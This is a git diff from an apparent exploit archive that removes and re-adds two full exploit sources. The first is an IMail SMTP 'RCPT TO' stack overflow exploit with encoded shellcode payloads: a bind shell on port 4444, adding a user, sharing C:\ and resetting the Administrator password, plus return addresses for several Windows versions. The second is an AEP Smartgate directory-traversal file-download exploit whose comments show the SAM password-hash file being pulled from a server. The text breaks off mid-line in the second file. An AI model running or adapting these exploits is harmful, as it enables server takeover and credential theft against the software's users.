- memset(overflow, 0, 1028); - strcat(overflow, Exp); - if (JMP == 1) - { - printf("Using IMail 8.15 SMTDP.DLL JMP\n"); - strcat(overflow, IMail815); - } else if (JMP == 2) - { - printf("Using Win2003 SP1 NTDLL.DLL JMP\n"); - strcat(overflow, Win2k3SP1E); - } else if (JMP == 3) - { - printf("Using Win2003 SP0 USER32.DLL JMP\n"); - strcat(overflow, Win2k3SP0E); - } else if (JMP == 4) - { - printf("Using WinXP SP2 NTDLL.DLL JMP\n"); - strcat(overflow, WinXPSP2E); - } else if (JMP == 5) - { - printf("Using WinXP SP1 and SP0 USER32.DLL JMP\n"); - strcat(overflow, WinXPSP1); - } else if (JMP == 6) - { - printf("Using Win2000 Universal English USER32.DLL JMP\n"); - strcat(overflow, Win2KE); - } else if (JMP == 7) - { - printf("Using Win2000 Universal French USER32.DLL JMP\n"); - strcat(overflow, Win2KF); - } else if (JMP == 8) - { - printf("Using WinXP SP2 and SP1 German USER32.DLL JMP\n"); - strcat(overflow, WinXPG); - } else { - printf("Using IMail 8.15 SMTDP.DLL JMP\n"); - strcat(overflow, IMail815); - } - - - - // Setup Payload Options - if (atoi(argv[3]) == 1) - { - printf("Using Root Share Payload\n"); - plen = 544 - ((strlen(RootShare) + strlen(StackS))); - for (i=0; ih_addrtype; - sockin.sin_port = htons(port); - sockin.sin_addr = *((struct in_addr *)hp->h_addr); - - if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR) - { - printf("ERROR: Socket Error\n"); - exit(-1); - } - - if ((connect(sockfd, (struct sockaddr *) &sockin, - sizeof(sockin))) == SOCKET_ERROR) - { - printf("Exploit Successfully Delivered!\n"); - closesocket(sockfd); - WSACleanup(); - printf("Don't Forget to Restart the IMAIL SMTP Service to Re-exploit!"); - exit(0); - } - printf("..."); - if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR) - { - printf("Exploit Successfully Delivered!\n"); - closesocket(sockfd); - WSACleanup(); - printf("Don't Forget to Restart the IMAIL SMTP Service to Re-exploit!"); - exit(0); - } - - /* wait for SMTP service welcome*/ - buf[bytes] = '\0'; - 
check = strstr(buf, "220"); - if (check == NULL) - { - printf("Exploit Successfully Delivered!\n"); - closesocket(sockfd); - WSACleanup(); - printf("Don't Forget to Restart the IMAIL SMTP Service to Re-exploit!"); - exit(0); - } - - printf("Exploit Failed: Try A different JMP Method or Payload\n"); - closesocket(sockfd); - WSACleanup(); - exit (1); -} - -// milw0rm.com [2006-10-19] +// IMail 2006 and 8.x SMTP Stack Overflow Exploit +// coded by Greg Linares [glinares.code[at]gmail[dot]com +// http://www.juniper.net/security/auto/vulnerabilities/vuln3414.html +// This works on the following versions: +// 2006 IMail prior to 2006.1 update + + +#include +#include +#include +#include + +#pragma comment(lib,"wsock32.lib") + +int main(int argc, char *argv[]) +{ +static char overflow[1028]; + + + +// PAYLOADS +// Restricted Chars = 0x00 0x0D 0x0A 0x20 0x3e 0x22 (Maybe More) + +/* win32_exec - EXITFUNC=seh CMD=net share Export=C:\ /unlimited Size=188 Encoder=ShikataGaNai http://metasploit.com */ +unsigned char RootShare[] = +"\xdb\xcb\x29\xc9\xba\xfa\xef\x47\x2b\xb1\x2a\xd9\x74\x24\xf4\x58" +"\x31\x50\x17\x83\xc0\x04\x03\xaa\xfc\xa5\xde\xb6\xeb\x6e\x21\x46" +"\xec\xe5\x64\x7a\x67\x85\x63\xfa\x76\x99\xe7\xb5\x60\xee\xa7\x69" +"\x90\x1b\x1e\xe2\xa6\x50\xa0\x1a\xf7\xa6\x3a\x4e\x7c\xe6\x49\x89" +"\xbc\x2d\xbc\x94\xfc\x59\x4b\xad\x54\xba\xb0\xa4\xb1\x49\xe7\x62" +"\x3b\xa5\x7e\xe1\x37\x72\xf4\xaa\x5b\x85\xe1\xdf\x78\x0e\xf4\x34" +"\x09\x4c\xd3\xce\xc9\x5c\xdb\xaa\x46\xde\xeb\xb7\x99\xa7\x07\x3c" +"\x59\x54\x93\x32\x46\xc9\x28\xda\x7e\xfa\x26\x91\xff\x4c\x38\xa5" +"\xff\x27\x51\x99\xa0\x06\x54\x81\x08\xe0\x60\xc2\x75\x89\xc0\xac" +"\x85\xe4\xe5\x73\x0e\x61\x1b\x01\xc0\xc6\x1b\xf2\xb3\x8d\x97\xdc" +"\x38\x26\x39\x6e\xda\x96\xfc\xf6\x54\xb8\x8c\x72\xa8\x05\x4b\x26" +"\xf2\xa6\xde\xb8\x9e\xd1\x4d\x2d\x2b\x47\xea\xad"; + + +/* win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=Pex http://metasploit.com */ +unsigned char Win32Bind[] = 
+"\x33\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x93" +"\x7b\xbd\x36\x83\xee\xfc\xe2\xf4\x6f\x11\x56\x7b\x7b\x82\x42\xc9" +"\x6c\x1b\x36\x5a\xb7\x5f\x36\x73\xaf\xf0\xc1\x33\xeb\x7a\x52\xbd" +"\xdc\x63\x36\x69\xb3\x7a\x56\x7f\x18\x4f\x36\x37\x7d\x4a\x7d\xaf" +"\x3f\xff\x7d\x42\x94\xba\x77\x3b\x92\xb9\x56\xc2\xa8\x2f\x99\x1e" +"\xe6\x9e\x36\x69\xb7\x7a\x56\x50\x18\x77\xf6\xbd\xcc\x67\xbc\xdd" +"\x90\x57\x36\xbf\xff\x5f\xa1\x57\x50\x4a\x66\x52\x18\x38\x8d\xbd" +"\xd3\x77\x36\x46\x8f\xd6\x36\x76\x9b\x25\xd5\xb8\xdd\x75\x51\x66" +"\x6c\xad\xdb\x65\xf5\x13\x8e\x04\xfb\x0c\xce\x04\xcc\x2f\x42\xe6" +"\xfb\xb0\x50\xca\xa8\x2b\x42\xe0\xcc\xf2\x58\x50\x12\x96\xb5\x34" +"\xc6\x11\xbf\xc9\x43\x13\x64\x3f\x66\xd6\xea\xc9\x45\x28\xee\x65" +"\xc0\x28\xfe\x65\xd0\x28\x42\xe6\xf5\x13\xac\x6a\xf5\x28\x34\xd7" +"\x06\x13\x19\x2c\xe3\xbc\xea\xc9\x45\x11\xad\x67\xc6\x84\x6d\x5e" +"\x37\xd6\x93\xdf\xc4\x84\x6b\x65\xc6\x84\x6d\x5e\x76\x32\x3b\x7f" +"\xc4\x84\x6b\x66\xc7\x2f\xe8\xc9\x43\xe8\xd5\xd1\xea\xbd\xc4\x61" +"\x6c\xad\xe8\xc9\x43\x1d\xd7\x52\xf5\x13\xde\x5b\x1a\x9e\xd7\x66" +"\xca\x52\x71\xbf\x74\x11\xf9\xbf\x71\x4a\x7d\xc5\x39\x85\xff\x1b" +"\x6d\x39\x91\xa5\x1e\x01\x85\x9d\x38\xd0\xd5\x44\x6d\xc8\xab\xc9" +"\xe6\x3f\x42\xe0\xc8\x2c\xef\x67\xc2\x2a\xd7\x37\xc2\x2a\xe8\x67" +"\x6c\xab\xd5\x9b\x4a\x7e\x73\x65\x6c\xad\xd7\xc9\x6c\x4c\x42\xe6" +"\x18\x2c\x41\xb5\x57\x1f\x42\xe0\xc1\x84\x6d\x5e\x63\xf1\xb9\x69" +"\xc0\x84\x6b\xc9\x43\x7b\xbd\x36"; + +/* win32_adduser - PASS=Error EXITFUNC=seh USER=Error Size=236 Encoder=PexFnstenvSub http://metasploit.com */ +unsigned char AddUser[] = +"\x2b\xc9\x83\xe9\xcb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb2" +"\xe6\xaf\x6a\x83\xeb\xfc\xe2\xf4\x4e\x0e\xeb\x6a\xb2\xe6\x24\x2f" +"\x8e\x6d\xd3\x6f\xca\xe7\x40\xe1\xfd\xfe\x24\x35\x92\xe7\x44\x23" +"\x39\xd2\x24\x6b\x5c\xd7\x6f\xf3\x1e\x62\x6f\x1e\xb5\x27\x65\x67" +"\xb3\x24\x44\x9e\x89\xb2\x8b\x6e\xc7\x03\x24\x35\x96\xe7\x44\x0c" 
+"\x39\xea\xe4\xe1\xed\xfa\xae\x81\x39\xfa\x24\x6b\x59\x6f\xf3\x4e" +"\xb6\x25\x9e\xaa\xd6\x6d\xef\x5a\x37\x26\xd7\x66\x39\xa6\xa3\xe1" +"\xc2\xfa\x02\xe1\xda\xee\x44\x63\x39\x66\x1f\x6a\xb2\xe6\x24\x02" +"\x8e\xb9\x9e\x9c\xd2\xb0\x26\x92\x31\x26\xd4\x3a\xda\x16\x25\x6e" +"\xed\x8e\x37\x94\x38\xe8\xf8\x95\x55\x85\xc2\x0e\x9c\x83\xd7\x0f" +"\x92\xc9\xcc\x4a\xdc\x83\xdb\x4a\xc7\x95\xca\x18\x92\xa3\xdd\x18" +"\xdd\x94\x8f\x2f\xc0\x94\xc0\x18\x92\xc9\xee\x2e\xf6\xc6\x89\x4c" +"\x92\x88\xca\x1e\x92\x8a\xc0\x09\xd3\x8a\xc8\x18\xdd\x93\xdf\x4a" +"\xf3\x82\xc2\x03\xdc\x8f\xdc\x1e\xc0\x87\xdb\x05\xc0\x95\x8f\x2f" +"\xc0\x94\xc0\x18\x92\xc9\xee\x2e\xf6\xe6\xaf\x6a"; + +/* win32_exec - CMD=net user Administrator "p@ssw0rd" Size=187 Encoder=Pex http://metasploit.com */ +unsigned char ChangeAdmin[] = +"\x29\xc9\x83\xe9\xda\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x74" +"\xb8\x4f\xba\x83\xee\xfc\xe2\xf4\x88\x50\x0b\xba\x74\xb8\xc4\xff" +"\x48\x33\x33\xbf\x0c\xb9\xa0\x31\x3b\xa0\xc4\xe5\x54\xb9\xa4\xf3" +"\xff\x8c\xc4\xbb\x9a\x89\x8f\x23\xd8\x3c\x8f\xce\x73\x79\x85\xb7" +"\x75\x7a\xa4\x4e\x4f\xec\x6b\xbe\x01\x5d\xc4\xe5\x50\xb9\xa4\xdc" +"\xff\xb4\x04\x31\x2b\xa4\x4e\x51\xff\xa4\xc4\xbb\x9f\x31\x13\x9e" +"\x70\x7b\x7e\x7a\x10\x33\x0f\x8a\xf1\x78\x37\xb6\xff\xf8\x43\x31" +"\x04\xa4\xe2\x31\x1c\xb0\xa4\xb3\xff\x38\xff\xba\x74\xb8\xc4\xd2" +"\x48\xe7\x7e\x4c\x14\xee\xc6\x42\xf7\x78\x34\xea\x1c\x48\xc5\xbe" +"\x2b\xd0\xd7\x44\xfe\xb6\x18\x45\x93\xd6\x2a\xce\x54\xcd\x3c\xdf" +"\x06\x98\x0b\xc8\x15\xd3\x2a\x9a\x5b\xd9\x2b\xde\x74\xb8\x4f\xba"; + + + WSADATA wsaData; + + struct hostent *hp; + struct sockaddr_in sockin; + char buf[300], *check; + int sockfd, bytes; + int plen, i, JMP; + char *hostname; + unsigned short port; + + printf("IMail 2006 and 8.x SMTP 'RCPT TO:' Stack Overflow Exploit\n"); + printf("Coded by Greg Linares < glinares.code [at] GMAIL [dot] com >\n"); + if (argc <= 1) + { + printf("Usage: %s [hostname] [port] \n", argv[0]); + printf("Default port is 25 \r\n"); + 
printf("==============================\n"); + printf("Payload Options: 1 = Default\n"); + printf("==============================\n"); + printf("1 = Share C:\\ as 'Export' Share\n"); + printf("2 = Add User 'Error' with Password 'Error'\n"); + printf("3 = Win32 Bind CMD to Port 4444\n"); + printf("4 = Change Administrator Password to 'p@ssw0rd'\n"); + printf("==============================\n"); + printf("JMP Options: 1 = Default\n"); + printf("==============================\n"); + printf("1 = IMAIL 8.x SMTPDLL.DLL [pop ebp, ret] 0x10036f71 \n"); + printf("2 = Win2003 SP1 English NTDLL.DLL [pop ebp, ret] 0x7c87d8af \n"); + printf("3 = Win2003 SP0 English USER32.DLL [pop ebp, ret] 0x77d02289 \n"); + printf("4 = WinXP SP2 English NTDLL.DLL [pop ebp, ret] 0x7c967e23 \n"); + printf("5 = WinXP SP1 - SP0 English USER32.DLL [pop ebp, ret] 0x71ab389c \n"); + printf("6 = Win2000 Universal English USER32.DLL [pop ebp, ret] 0x75021397 \n"); + printf("7 = Win2000 Universal French USER32.DLL [pop ebp, ret] 0x74fa1397 \n"); + printf("8 = Windows XP SP1 - SP2 German USER32.DLL [pop ebp, ret] 0x77d18c14 \r\n"); + + exit(0); + } + + hostname = argv[1]; + if (argv[2]) port = atoi(argv[2]); + else port = atoi("25"); + if (argv[4]) JMP = atoi(argv[4]); + else JMP = atoi("1"); + + if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0) + { + fprintf(stderr, "Error setting up with WinSock v1.1\n"); + exit(-1); + } + + + hp = gethostbyname(hostname); + if (hp == NULL) + { + printf("ERROR: Uknown host %s\n", hostname); + printf("%s",hostname); + exit(-1); + } + + sockin.sin_family = hp->h_addrtype; + sockin.sin_port = htons(port); + sockin.sin_addr = *((struct in_addr *)hp->h_addr); + + if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR) + { + printf("ERROR: Socket Error\n"); + exit(-1); + } + + if ((connect(sockfd, (struct sockaddr *) &sockin, + sizeof(sockin))) == SOCKET_ERROR) + { + printf("ERROR: Connect Error\n"); + closesocket(sockfd); + WSACleanup(); + exit(-1); + } + + 
printf("Connected to [%s] on port [%d], sending overflow....\n", + hostname, port); + + + if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR) + { + printf("ERROR: Recv Error\n"); + closesocket(sockfd); + WSACleanup(); + exit(1); + } + + /* wait for SMTP service welcome*/ + buf[bytes] = '\0'; + check = strstr(buf, "220"); + if (check == NULL) + { + printf("ERROR: NO response from SMTP service\n"); + closesocket(sockfd); + WSACleanup(); + exit(-1); + } + + + // JMP to EAX = Results in a Corrupted Stack + // so instead we POP EBP, RET to restore pointer and then return + // this causes code procedure to continue + /* + ['IMail 8.x Universal', 0x10036f71 ], + ['Windows 2003 SP1 English', 0x7c87d8af ], + ['Windows 2003 SP0 English', 0x77d5c14c ], + ['Windows XP SP2 English', 0x7c967e23 ], + ['Windows XP SP1 English', 0x71ab389c ], + ['Windows XP SP0 English', 0x71ab389c ], + ['Windows 2000 Universal English', 0x75021397 ], + ['Windows 2000 Universal French', 0x74fa1397], + ['Windows XP SP1 - SP2 German', 0x77d18c14], + */ + char Exp[] = "RCPT TO: <@"; // This stores our JMP between the @ and : + char Win2k3SP1E[] = "\xaf\xd8\x87\x7c:"; //Win2k3 SP1 English NTDLL.DLL [pop ebp, ret] 0x7c87d8af + char WinXPSP2E[] = "\x23\x7e\x96\x7c:"; //WinXP SP2 English NTDLL.DLL [pop ebp, ret] 0x7c967e23 + char IMail815[] = "\x71\x6f\x03\x10:"; //IMAIL 8.15 SMTPDLL.DLL [pop ebp, ret] 0x10036f71 + char Win2k3SP0E[] = "\x4c\xc1\xd5\x77:"; //Win2k3 SP0 English USER32.DLL [pop ebp, ret]0x77d5c14c + char WinXPSP2[] = "\x23\x7e\x96\x7c:"; //WinXP SP2 English USER32.DLL [pop ebp, ret] 0x7c967e23 + char WinXPSP1[] = "\x9c\x38\xab\x71:"; //WinXP SP1 and 0 English U32 [pop ebp, ret]0x71ab389c + char Win2KE[] = "\x97\x31\x02\x75:"; //Win2k English All SPs [pop ebp, ret]0x75021397 + char Win2KF[] = "\x97\x13\xfa\x74:"; // As above except French Win2k [pop ebp, ret]0x74fa1397 + char WinXPG[] = "\x14\x8c\xd1\x77:"; //WinXP SP1 - SP2 German U32 [pop ebp, ret]0x77d18c14 + + char tail[] = "SSS>\n"; 
// This closes the RCPT cmd. Any characters work. + // Another overflow can be achieved by using an overly long buffer after RCPT TO: on 8.15 systems + // After around 560 bytes or so EIP gets overwritten. But this method is easier to exploit and it works + // On all versions from 8.x to 2006 (9.x?) + char StackS[] = "\x81\xc4\xff\xef\xff\xff\x44"; // Stabolize Stack prior to payload. + memset(overflow, 0, 1028); + strcat(overflow, Exp); + if (JMP == 1) + { + printf("Using IMail 8.15 SMTDP.DLL JMP\n"); + strcat(overflow, IMail815); + } else if (JMP == 2) + { + printf("Using Win2003 SP1 NTDLL.DLL JMP\n"); + strcat(overflow, Win2k3SP1E); + } else if (JMP == 3) + { + printf("Using Win2003 SP0 USER32.DLL JMP\n"); + strcat(overflow, Win2k3SP0E); + } else if (JMP == 4) + { + printf("Using WinXP SP2 NTDLL.DLL JMP\n"); + strcat(overflow, WinXPSP2E); + } else if (JMP == 5) + { + printf("Using WinXP SP1 and SP0 USER32.DLL JMP\n"); + strcat(overflow, WinXPSP1); + } else if (JMP == 6) + { + printf("Using Win2000 Universal English USER32.DLL JMP\n"); + strcat(overflow, Win2KE); + } else if (JMP == 7) + { + printf("Using Win2000 Universal French USER32.DLL JMP\n"); + strcat(overflow, Win2KF); + } else if (JMP == 8) + { + printf("Using WinXP SP2 and SP1 German USER32.DLL JMP\n"); + strcat(overflow, WinXPG); + } else { + printf("Using IMail 8.15 SMTDP.DLL JMP\n"); + strcat(overflow, IMail815); + } + + + + // Setup Payload Options + if (atoi(argv[3]) == 1) + { + printf("Using Root Share Payload\n"); + plen = 544 - ((strlen(RootShare) + strlen(StackS))); + for (i=0; ih_addrtype; + sockin.sin_port = htons(port); + sockin.sin_addr = *((struct in_addr *)hp->h_addr); + + if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR) + { + printf("ERROR: Socket Error\n"); + exit(-1); + } + + if ((connect(sockfd, (struct sockaddr *) &sockin, + sizeof(sockin))) == SOCKET_ERROR) + { + printf("Exploit Successfully Delivered!\n"); + closesocket(sockfd); + WSACleanup(); + printf("Don't Forget 
to Restart the IMAIL SMTP Service to Re-exploit!"); + exit(0); + } + printf("..."); + if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR) + { + printf("Exploit Successfully Delivered!\n"); + closesocket(sockfd); + WSACleanup(); + printf("Don't Forget to Restart the IMAIL SMTP Service to Re-exploit!"); + exit(0); + } + + /* wait for SMTP service welcome*/ + buf[bytes] = '\0'; + check = strstr(buf, "220"); + if (check == NULL) + { + printf("Exploit Successfully Delivered!\n"); + closesocket(sockfd); + WSACleanup(); + printf("Don't Forget to Restart the IMAIL SMTP Service to Re-exploit!"); + exit(0); + } + + printf("Exploit Failed: Try A different JMP Method or Payload\n"); + closesocket(sockfd); + WSACleanup(); + exit (1); +} + +// milw0rm.com [2006-10-19] diff --git a/platforms/windows/remote/2637.c b/platforms/windows/remote/2637.c index 0bc842c69..a39a5fbb0 100755 --- a/platforms/windows/remote/2637.c +++ b/platforms/windows/remote/2637.c 
@@ -1,219 +1,219 @@ -/* prdelka-vs-AEP-smartgate - * ======================== - * Smartgate is an application layer security gateway that meets FIPS 140-2 - * requirements for large-scale networked environments for IP-based Networks. - * AEP provide network solutions for government, law enforcement, homeland security, - * public safety, criminal intelligence and much more. - * - * A vulnerability exists in the smartgate SSL server (listens on port 443 by default) - * which may allow a malicious user to download arbitrary files with the priviledges - * of the smartgate server. - * - * By analyzing the returned HTTP header response, an attacker can also test for the - * existance of a remote directory. Remote directories return a "Moved Permanently" - * error, as opposed to a 404, as shown below. - * - * localhost 0day # ./prdelka-vs-AEP-smartgate -s www.target.com -p 443 -f progra~1/v-one/smartgate/data -l sgusrdb.idx - * [ AEP/Smartgate arbitrary file download exploit - * [ Connected to www.target.com via (443/tcp) - * [ Displaying raw HTTP response details - * HTTP/1.0 301 Moved Permanently - * Date: Tue Nov 22 16:53:11 GMT+00:00 2005 - * Location: /..\..\..\..\..\..\..\progra~1/v-one/smartgate/data/ - * Server: SSLSERVER/1.0 - * Content-Type: text/html - * Expires: Now - * - * [ Exploit success, directory found - * - * A number of files/directories on win32 installations of smartgate may help the attacker further compromise - * the VPN. Under unix installations the default root directory of smartgate is "/usr/smartgate" but may vary. - * - * + progra~1/v-one/smartgate - default directory for smartgate installation. - * + data - default directory for data files. - * - adm-gw.acl - admin users are defined here. - * - reginfo.dat - defines data entry fields for users. - * - sgate.acl - access control for secured TCP services. - * - sgconf.ini - dynamic information on the smartgate server including CA information. 
- * - sgusrdb.idx - contains userid status,long name,group,auth key. - * - sweb.acl - provides access control to webserver. - * - sweb.dny - denies access to specified webservers. - * + winnt - common system root directory, varies. - * + repair - contains backup SAM file. - * - sam - backup of SAM file containing password hashes. - * + system32 - common system32 directory, resides above %sysroot% - * - kernel32.dll - detailed information of win32 version installed. - * - * Example. - * Below is an example of exploit being used to retrieve the SAM password file in a real world attack. This - * exploit is untested against unix implementations of smartgate but should function as expected with little - * or no modification (char *http1). Tested against Smartgate V4.3B - * - * localhost 0day # gcc prdelka-vs-AEP-smartgate.c -o prdelka-vs-AEP-smartgate -lssl - * localhost 0day # ./prdelka-vs-AEP-smartgate -s www.target.com -p 443 -f winnt/repair/sam. -l sam - * [ AEP/Smartgate arbitrary file download exploit - * [ Connected to www.target.com via (443/tcp) - * [ Displaying raw HTTP response details - * HTTP/1.0 200 OK - * Date: Tue Nov 22 17:06:00 GMT+00:00 2005 - * Content-type: text/plain - * Content-length: 20480 - * Server: SSLSERVER/1.0 - * Expires: Now - * - * [ Exploit success, file found - * [ Recieved 20480 byte(s) and saved as 'sam' - * - * - prdelka - */ -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -int main(int argc,char *argv[]) -{ - BIO * bio; - SSL * ssl; - SSL_CTX * ctx; - int p,c,fd,index = 0; - unsigned long size = 0; - int ihost = 0, iport = 0, ifile = 0, ilocal = 0, check = 0; - char *host,*request,*file,*connect,*port,*httpbuf,*httpbuf2; - char *http1 = "GET /..\\..\\..\\..\\..\\..\\..\\"; - char *http2 = " HTTP/1.1\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A"; - char r[1024]; - static struct option options[]= { - {"server", 1, 0, 's'}, - {"port", 1 , 0, 'p'}, - {"remotefile", 1, 0, 'f'}, - 
{"localfile", 1, 0, 'l'}, - {"help", 0, 0, 'h'} - }; - printf("[ AEP/Smartgate arbitrary file download exploit\n"); - while(c != -1) - { - c = getopt_long(argc,argv,"s:p:f:l:h",options,&index); - switch(c){ - case -1: - break; - case 's': - host = malloc(strlen(optarg) + 1); - sprintf(host,"%s",optarg); - ihost = 1; - break; - case 'p': - port = malloc(strlen(optarg) + 1); - sprintf(port,"%s",optarg); - iport = 1; - break; - case 'f': - request = malloc(strlen(optarg) + strlen(http1) + strlen(http2) + 1); - sprintf(request,"%s%s%s",http1,optarg,http2); - ifile = 1; - break; - case 'l': - file = malloc(strlen(optarg) + 1); - sprintf(file,"%s",optarg); - ilocal = 1; - break; - case 'h': - printf("[\n[ %s\n",argv[0]); - printf("[ --server|-s \n"); - printf("[ --port|-p \n"); - printf("[ --remotefile|-f \n"); - printf("[ --localfile|-l \n"); - printf("[\n[ For a more detailed explanation read the source\n"); - exit(0); - break; - default: - break; - - } - } - if(ihost != 1 || iport != 1 || ifile != 1 || ilocal != 1){ - printf("[ Try %s --help\n",argv[0]); - exit(0); - } - ERR_load_BIO_strings(); - SSL_load_error_strings(); - OpenSSL_add_all_algorithms(); - ctx = SSL_CTX_new(SSLv23_client_method()); - bio = BIO_new_ssl_connect(ctx); - BIO_get_ssl(bio, & ssl); - SSL_set_mode(ssl, SSL_MODE_AUTO_RETRY); - connect = malloc(strlen(host) + strlen(port) + 2); - sprintf(connect,"%s:%s",host,port); - BIO_set_conn_hostname(bio, connect); - if(BIO_do_connect(bio) <= 0) - { - fprintf(stderr, "[ Error attempting to connect\n"); - ERR_print_errors_fp(stderr); - BIO_free_all(bio); - SSL_CTX_free(ctx); - return 0; - } - printf("[ Connected to %s via (%s/tcp)\n",host,port); - BIO_write(bio, request, strlen(request)); - check = 0; - httpbuf = malloc(2); - memset(httpbuf,0,2); - while(check == 0) - { - p = BIO_read(bio, r, 1); - r[p] = 0; - httpbuf2 = malloc(strlen(r) + strlen(httpbuf) + 1); - sprintf(httpbuf2,"%s%s",httpbuf,r); - free(httpbuf); - httpbuf = httpbuf2; - check = 
(int)strstr(httpbuf,"\n\n"); - } - printf("[ Displaying raw HTTP response details\n"); - printf("%s",httpbuf); - check = 0; - check = (int)strstr(httpbuf,"200 OK"); - if(check != 0) - { - printf("[ Exploit success, file found\n"); - fd = open(file,O_RDWR|O_CREAT,S_IRWXU); - if(fd == -1){ - printf("[ Error creating %s",file); - exit(0); - } - for(;;) - { - p = BIO_read(bio, r, 1023); - if(p <= 0) break; - r[p] = 0; - write(fd,r,p); - size = size + p; - } - printf("[ Recieved %u byte(s) and saved as '%s'\n",size,file); - close(fd); - } - if(check==0) - { - check = (int)strstr(httpbuf,"301 Moved"); - if(check != 0) - { - printf("[ Exploit success, directory found\n"); - } - } - free(httpbuf); - if(check == 0) - { - printf("[ Exploit failed\n"); - } - BIO_free_all(bio); - SSL_CTX_free(ctx); - return 0; -} - -// milw0rm.com [2006-10-24] +/* prdelka-vs-AEP-smartgate + * ======================== + * Smartgate is an application layer security gateway that meets FIPS 140-2 + * requirements for large-scale networked environments for IP-based Networks. + * AEP provide network solutions for government, law enforcement, homeland security, + * public safety, criminal intelligence and much more. + * + * A vulnerability exists in the smartgate SSL server (listens on port 443 by default) + * which may allow a malicious user to download arbitrary files with the priviledges + * of the smartgate server. + * + * By analyzing the returned HTTP header response, an attacker can also test for the + * existance of a remote directory. Remote directories return a "Moved Permanently" + * error, as opposed to a 404, as shown below. 
+ * + * localhost 0day # ./prdelka-vs-AEP-smartgate -s www.target.com -p 443 -f progra~1/v-one/smartgate/data -l sgusrdb.idx + * [ AEP/Smartgate arbitrary file download exploit + * [ Connected to www.target.com via (443/tcp) + * [ Displaying raw HTTP response details + * HTTP/1.0 301 Moved Permanently + * Date: Tue Nov 22 16:53:11 GMT+00:00 2005 + * Location: /..\..\..\..\..\..\..\progra~1/v-one/smartgate/data/ + * Server: SSLSERVER/1.0 + * Content-Type: text/html + * Expires: Now + * + * [ Exploit success, directory found + * + * A number of files/directories on win32 installations of smartgate may help the attacker further compromise + * the VPN. Under unix installations the default root directory of smartgate is "/usr/smartgate" but may vary. + * + * + progra~1/v-one/smartgate - default directory for smartgate installation. + * + data - default directory for data files. + * - adm-gw.acl - admin users are defined here. + * - reginfo.dat - defines data entry fields for users. + * - sgate.acl - access control for secured TCP services. + * - sgconf.ini - dynamic information on the smartgate server including CA information. + * - sgusrdb.idx - contains userid status,long name,group,auth key. + * - sweb.acl - provides access control to webserver. + * - sweb.dny - denies access to specified webservers. + * + winnt - common system root directory, varies. + * + repair - contains backup SAM file. + * - sam - backup of SAM file containing password hashes. + * + system32 - common system32 directory, resides above %sysroot% + * - kernel32.dll - detailed information of win32 version installed. + * + * Example. + * Below is an example of exploit being used to retrieve the SAM password file in a real world attack. This + * exploit is untested against unix implementations of smartgate but should function as expected with little + * or no modification (char *http1). 
Tested against Smartgate V4.3B + * + * localhost 0day # gcc prdelka-vs-AEP-smartgate.c -o prdelka-vs-AEP-smartgate -lssl + * localhost 0day # ./prdelka-vs-AEP-smartgate -s www.target.com -p 443 -f winnt/repair/sam. -l sam + * [ AEP/Smartgate arbitrary file download exploit + * [ Connected to www.target.com via (443/tcp) + * [ Displaying raw HTTP response details + * HTTP/1.0 200 OK + * Date: Tue Nov 22 17:06:00 GMT+00:00 2005 + * Content-type: text/plain + * Content-length: 20480 + * Server: SSLSERVER/1.0 + * Expires: Now + * + * [ Exploit success, file found + * [ Recieved 20480 byte(s) and saved as 'sam' + * + * - prdelka + */ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +int main(int argc,char *argv[]) +{ + BIO * bio; + SSL * ssl; + SSL_CTX * ctx; + int p,c,fd,index = 0; + unsigned long size = 0; + int ihost = 0, iport = 0, ifile = 0, ilocal = 0, check = 0; + char *host,*request,*file,*connect,*port,*httpbuf,*httpbuf2; + char *http1 = "GET /..\\..\\..\\..\\..\\..\\..\\"; + char *http2 = " HTTP/1.1\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A"; + char r[1024]; + static struct option options[]= { + {"server", 1, 0, 's'}, + {"port", 1 , 0, 'p'}, + {"remotefile", 1, 0, 'f'}, + {"localfile", 1, 0, 'l'}, + {"help", 0, 0, 'h'} + }; + printf("[ AEP/Smartgate arbitrary file download exploit\n"); + while(c != -1) + { + c = getopt_long(argc,argv,"s:p:f:l:h",options,&index); + switch(c){ + case -1: + break; + case 's': + host = malloc(strlen(optarg) + 1); + sprintf(host,"%s",optarg); + ihost = 1; + break; + case 'p': + port = malloc(strlen(optarg) + 1); + sprintf(port,"%s",optarg); + iport = 1; + break; + case 'f': + request = malloc(strlen(optarg) + strlen(http1) + strlen(http2) + 1); + sprintf(request,"%s%s%s",http1,optarg,http2); + ifile = 1; + break; + case 'l': + file = malloc(strlen(optarg) + 1); + sprintf(file,"%s",optarg); + ilocal = 1; + break; + case 'h': + printf("[\n[ %s\n",argv[0]); + printf("[ --server|-s 
\n"); + printf("[ --port|-p \n"); + printf("[ --remotefile|-f \n"); + printf("[ --localfile|-l \n"); + printf("[\n[ For a more detailed explanation read the source\n"); + exit(0); + break; + default: + break; + + } + } + if(ihost != 1 || iport != 1 || ifile != 1 || ilocal != 1){ + printf("[ Try %s --help\n",argv[0]); + exit(0); + } + ERR_load_BIO_strings(); + SSL_load_error_strings(); + OpenSSL_add_all_algorithms(); + ctx = SSL_CTX_new(SSLv23_client_method()); + bio = BIO_new_ssl_connect(ctx); + BIO_get_ssl(bio, & ssl); + SSL_set_mode(ssl, SSL_MODE_AUTO_RETRY); + connect = malloc(strlen(host) + strlen(port) + 2); + sprintf(connect,"%s:%s",host,port); + BIO_set_conn_hostname(bio, connect); + if(BIO_do_connect(bio) <= 0) + { + fprintf(stderr, "[ Error attempting to connect\n"); + ERR_print_errors_fp(stderr); + BIO_free_all(bio); + SSL_CTX_free(ctx); + return 0; + } + printf("[ Connected to %s via (%s/tcp)\n",host,port); + BIO_write(bio, request, 